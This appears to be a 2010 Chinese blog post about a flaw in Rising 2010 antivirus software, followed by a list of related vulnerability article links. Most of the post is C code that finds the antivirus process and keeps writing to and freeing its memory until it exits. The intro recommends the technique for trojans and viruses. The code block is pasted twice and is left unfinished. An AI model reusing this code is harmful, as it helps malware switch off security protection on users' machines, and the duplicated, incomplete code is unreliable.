瑞星2010年组合版最新漏洞
2010-03-04 05:17
253 查看
漏洞简介:向瑞星内存地址不断写入代码使其出错退出,木马病毒首选
测试代码:
DWORD GetProcessIdFromName(LPCTSTR name)
{
PROCESSENTRY32 pe;
DWORD id = 0;
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
pe.dwSize = sizeof(PROCESSENTRY32);
if( !Process32First(hSnapshot,&pe) )
return 0;
do
{
pe.dwSize = sizeof(PROCESSENTRY32);
if( Process32Next(hSnapshot,&pe)==FALSE )
break;
if(strcmp(pe.szExeFile,name) == 0)
{
id = pe.th32ProcessID;
break;
}
} while(1);
CloseHandle(hSnapshot);
return id;
}
DWORD GetProcessID(char *FileName)
{
HANDLE myhProcess;
PROCESSENTRY32 mype;
BOOL mybRet;
//进行进程快照
myhProcess=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
//TH32CS_SNAPPROCESS快照所有进程
//开始进程查找
mybRet=Process32First(myhProcess,&mype);
//循环比较,得出ProcessID
while(mybRet)
{
if(strcmp(FileName,mype.szExeFile)==0)
return mype.th32ProcessID;
else
mybRet=Process32Next(myhProcess,&mype);
}
return 0;
}
void killProcess(CString www ,LPCTSTR name,char *xyz)
{
DWORD nPid = 0;
HANDLE hProcess;
DWORD nExitCode = 0;
DWORD nAddress = 0x1000;
nPid=GetProcessIdFromName(name);
hProcess = OpenProcess (PROCESS_QUERY_INFORMATION |
PROCESS_VM_OPERATION, 0,nPid);
WriteProcessMemory(hProcess,(LPVOID)0x0047EB17,&nPid,1,NULL);
while ( nAddress <= 0x7FFFF000 )
{
GetExitCodeProcess(hProcess, &nExitCode);
if (nExitCode != STILL_ACTIVE)
{
break;
}
WriteProcessMemory(hProcess,(LPVOID)0x0047EB17,&nPid,1,NULL);
VirtualFreeEx(hProcess, (LPVOID)nAddress, 0, 0x8000);
nAddress += 0x1000;
}
测试代码:
DWORD GetProcessIdFromName(LPCTSTR name)
{
PROCESSENTRY32 pe;
DWORD id = 0;
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
pe.dwSize = sizeof(PROCESSENTRY32);
if( !Process32First(hSnapshot,&pe) )
return 0;
do
{
pe.dwSize = sizeof(PROCESSENTRY32);
if( Process32Next(hSnapshot,&pe)==FALSE )
break;
if(strcmp(pe.szExeFile,name) == 0)
{
id = pe.th32ProcessID;
break;
}
} while(1);
CloseHandle(hSnapshot);
return id;
}
DWORD GetProcessID(char *FileName)
{
HANDLE myhProcess;
PROCESSENTRY32 mype;
BOOL mybRet;
//进行进程快照
myhProcess=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
//TH32CS_SNAPPROCESS快照所有进程
//开始进程查找
mybRet=Process32First(myhProcess,&mype);
//循环比较,得出ProcessID
while(mybRet)
{
if(strcmp(FileName,mype.szExeFile)==0)
return mype.th32ProcessID;
else
mybRet=Process32Next(myhProcess,&mype);
}
return 0;
}
void killProcess(CString www ,LPCTSTR name,char *xyz)
{
DWORD nPid = 0;
HANDLE hProcess;
DWORD nExitCode = 0;
DWORD nAddress = 0x1000;
nPid=GetProcessIdFromName(name);
hProcess = OpenProcess (PROCESS_QUERY_INFORMATION |
PROCESS_VM_OPERATION, 0,nPid);
WriteProcessMemory(hProcess,(LPVOID)0x0047EB17,&nPid,1,NULL);
while ( nAddress <= 0x7FFFF000 )
{
GetExitCodeProcess(hProcess, &nExitCode);
if (nExitCode != STILL_ACTIVE)
{
break;
}
WriteProcessMemory(hProcess,(LPVOID)0x0047EB17,&nPid,1,NULL);
VirtualFreeEx(hProcess, (LPVOID)nAddress, 0, 0x8000);
nAddress += 0x1000;
}
相关文章推荐
- 微软发布2010年第一个IE 0day、"极光"ie高危漏洞警告的解决办法和最新官方补丁下载地址
- 2010年java最新教程电子书下载
- Struts2 最新高危漏洞详解
- dedecms漏洞getshell EXP最新可用
- ECSHOP 最新补丁 安全漏洞补丁[20110214] 修改点总结
- 微软发布最新补丁,修改VS2005可能被他人完全控制的漏洞
- 动网8.0最新远程注入漏洞来了
- struts2 最新S2-016-S2-017漏洞通杀struts2所有版本及修复方法
- Tomcat最新漏洞说明
- 黑马程序员-Java7爆最新漏洞,10年前的攻击手法仍有效-转
- 中间人攻击,也谈Firefox/Google Toolbar最新的安全漏洞
- dedecms最新高危漏洞 建议用户及时更新漏洞补丁
- struts2 最新S2-016-S2-017漏洞通杀struts2所有版本
- 动易2006_SP6最新漏洞得到管理员密码(转)
- MiniWeb0.8.19的最新漏洞分析及利用方法!
- Wooyun最新确认漏洞爬虫V0.02
- 微软Technet安全技术中心,最新安全公告漏洞更新补丁发布。
- Windows最新十大安全漏洞
- LJez System Ver2.5文章系统最新漏洞
- 微软最新九个严重漏洞